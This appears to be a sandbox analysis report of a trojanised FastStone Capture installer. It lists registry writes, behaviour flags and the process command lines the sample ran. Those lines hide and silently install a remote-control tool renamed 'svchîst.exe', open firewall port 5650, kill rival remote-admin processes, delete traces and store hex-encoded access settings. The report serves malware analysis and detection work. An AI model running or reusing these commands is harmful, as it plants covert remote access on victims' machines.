| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c4653456c3461323155515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c4a484f58525a563278315355633161474a585657646a4d3278365a45645764456c49546d786a626c70775933704661553144515564424d5656465158643357677053527a6c305756647364556c484e5768695631566e597a4e73656d5248566e524a534535735932356163474e3651575647647a4235545770424d45317159336c4e56456b7a5455526f59555a334d48704e616b4577436b317155586c4e56456b7a5455526f5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73525749794d576868567a526e596d314764467054516e6f4b5a56684f4d4670584d47646a4d6c5a355a473173656b31545358644a51566c45566c465252455243624556694d6a466f595663305a324a74526e526155304a365a56684f4d4670584d47646a4d6c5a355a4731736567704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a30744451564646515859774e566c6f566c6450576a4d77656c645164316c6e54306c5a436d59765a6d513561586c57576a6c484e58565253484a686357464652577051555868354e7a56756556683663454e695532356f52474d7257474a685a566c554d304972616c4130556e5a5857453945556d70514c7a454b5248677757574e33535755314f57497a54566c4c59314a546458467a4f54567756564673656d773151693879516b524a63335635646d6869554778705a53733557566f31646c6461656e7055556b466e61557474576770304c304530556e5a6e62546c304f45566d6545526853577434516b64714e4735424e324a5455544e544d544654536c56485a584577626e5a79535774715557387661324532655656535a544a6e634664574e7a5630436d31505a556c726555357a643274714d5774364e31526164556c5665453570543359305547527a51334e615755744c5532353362314a5a4d486846656c425a5647565a55465236546b3961596a5930655535724d33514b6155497962585a3059335a4d56316452616c4a73556d7872543352545756466e513039564d555577527a5a4c566d67354e5574534e586b3154466c7059314a7357533971655745724e3364795a474e4f5953394455676f7a55556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b4652516d35735a6d46354e3155324d48564d575538786331417663476836656c5a364b327472646b4e6a436a51794e6c6c4f59334678563064466469744b546d6c4763546776554870544d564271524646616245466964556852524852445955394c566e4e7961474e45556b4673616e55314f47395352585a6a4e6c52564e30494b4e6a526d4d574a794e584e71544851334e584e524d30307657484a345456704263564249616e647763565a505455307a655868615330686b5245355a4d586c55566b3174596b3147556d6c594f475a30554652495641704555556479537a4577516a684f4f444e6164556c5462445a4f4e58423061314a304e6e6f345a44524b626d5a5455555a755a7a4d30516d646f545464594f55347857554659656c4e56626a4a4252304a4a57576b35436b4a7553325a426557787965445a68546a6c4b4f4856706257316f596e593259304678516c566957444a695957646b617a4252656d394353584a53617a5976536a4e5062484e704d446459617a45764d3268355745344b4f45387761476879626a41785a45784a57454e59636c464e647a6870614842505557787159306874595735484c30354856466f724e334a335a5646455a6d5179576d6878574735724e6b634b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a5355563255556c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746a6432646e553270425a3056425157394a516b46525179395562476c47566c6b31626d5a55546c6b4b4c304a705154526f614338354f544d7954457057626a4269625456425a58527863473952553030355245684d646d316d536d5a506130703053325646546e6f315a4852774e576851593067325453396f527a6c6159776f30546b644e4c7939565545685361487042614464754d585a6a6547647765455a4c4e6e46364d323173556b4e59543168725343395a525531706554644c4b305a7a4b31644b4e7a6378614735744f5670755545354f436b564451306c78576d307a4f45526f52797444596a497a6431497652553576615652465257465161574e456448524b5247524d57465a4a624646614e6e4a545a53747a61564e4f51326f72556e4a79536c4a474e32454b5132786157485a744d6c6b314e476c5553544a3651314e5156315251644535744e47685552544a4a4e69396e4f544a33533368735a32397753325a4461455a715645565554546c6f546a566e4f56424e4d44567364677079616b6b7956475579535568685953737865546830576c7044546b6457523164524e6a464b61454e425354565556565252596d39775630677a61334249626b787264476c4b6545645761697451536e4933646b4e30436a46334d584934536b686b5157644e516b464252554e6e5a305642596b35304e7a593054575a7655335a5351304a58544573726444637a57466443656b45335957685756555a3457586c6c526c4259616e56545a6d454b4e6c5235526e5273567a4a4c5a6c6c6b59585634566d74584e574e4c4d45684b4c7a5a76645759764d6b524a556a5a6a626e647a563356344e323553635739355553744b513270304d6e5a61626e705061574e4f5367705662446b325933646e4e6d5233647a45314c33426c5a4774775247783457476452595764534d306c424b33646b4f473561516e67354e5339704f56525656485a6f6545747656555a5859576c74523368315a57646e436b59315446647464486c59556e70494d314576613273316244497257584579537a4244635441304e557075646d68685669383256466c736133705665584a6f64334a76626c466a616b314b4e486844576b5a7a4b33494b51305a6c556b6c5a5a45786a526a4a5954556c3359557433536d3143595452334d44466a64556c48564567346346563263566c42536d684c656b5a5761326830596a4930516d4a695a4646615a31424d5930553156777047636d5130553077776555784952445172616c4655625849334d444a684e7a6c51656d45776543393356466c6f4e47747356334e775a31464c516d6452524756686347513259337031524574744c3273794e33646b436a5a68565777336145684c57564a31526c6c495a555653656a517955544246537a5a71536b4e47576c4247613055785a576433643246564c31526d6556527257484a56526b70565a303951626e67724c3274355a32734b54565668546c4248654531755a4651344e576469614864516555396e5445646e553368334d6d4e4661566c75576c425a52444d346255686853456c325a54464651584a585955464f6544567262574635556b4e4353676f3352334a7359324a69526b74684b3255346347526e5655563462454a4b52585673555574435a31464559303155533152785757394e6547777a4e303535576c4a544e6b49776333643152474d345155396b55476477436c4d7a4f54467262586c33566a5a424c325a6b55456c695747646d626d5236546d39475379393563314e76656b74735255645253305654656e6f3065574534546e6b3161586c7761445a5856546b336430464a5353384b526d744d627a46546254517a4d6b686a5746567756485672576b39505a6b4632537a426b4d54493053324a464e5535444d7a4271516a526d5a6d68796357464862556443646d567665544a75626e644c4f58497a526770524e474e4c655852546330745253304a6e52336b77616d6c78564464584f56524c4d30316e616d78595656683462327832526a5134616d5a59626c4e3554455678656e686a54456c7a53556c6b4e4452784e485633436a46764b33517a65477836526c5671574556585a4739454d3039735a56465a5630564c4f564e5961477478563056426346643361334a55646b513051555134555656774c31686c53477850626b704361544a786144414b647a6c4461545a7354566833626a4e61616d6443615770774d6d686b51304e69526b5653625778614d584a3462574e364e5467354c3245774d5446615a46517951326844536c706c5a6e524262306443515570325a67704e4f5751784e5374555a453034516c684d55575a5761573550655567774f576836517a5232646c5a444d6c46715979396d56453572516b6431546e4a715458557765446c4861433877525570704c326330566b4a42436974514d324d79626e637253334131554667784d574a774b79747555335a59546e6f7a4e6b565559546c4f52325a6163577730644739716231564b5a3156724b3052325247356a546b4a7155324e59656e45775555384b523231324d315a71524868326355564552334177616b5a326133706d63457777536b46724e6a4972534752355331687853317036634546765230464e554868755747683061464e684d6c526d4d46684a6255356f564170765954426d4d6a5a31626d705962556434617a6b335744686a52585633646d6c6862577472554374785a33464f5a7a68574e554a4c5256597a4b30744f5a6e67334c324a4b564468785a6e55315a4770704b314e5a436d38305330355a57586c53616d35306445684f53577861526a644c56555649613251724d46466a544764786258465864335231566a6476617a6c6e4c3146504e693936636e424d5469387a63584a6a5345646b61586b4b53445a536547394c4d484d79624373304e455233516d524464475a4261326339436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe
"C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f
C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
"C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe" /S /IR
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 5650 "Open Port 5650"
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall delete rule name="all" remoteip=95.141.193.133
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650
C:\Windows\SysWOW64\drivers\install.exe
"C:\Windows\System32\drivers\install.exe"
C:\Windows\SysWOW64\route.exe
route.exe delete 95.141.193.133
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e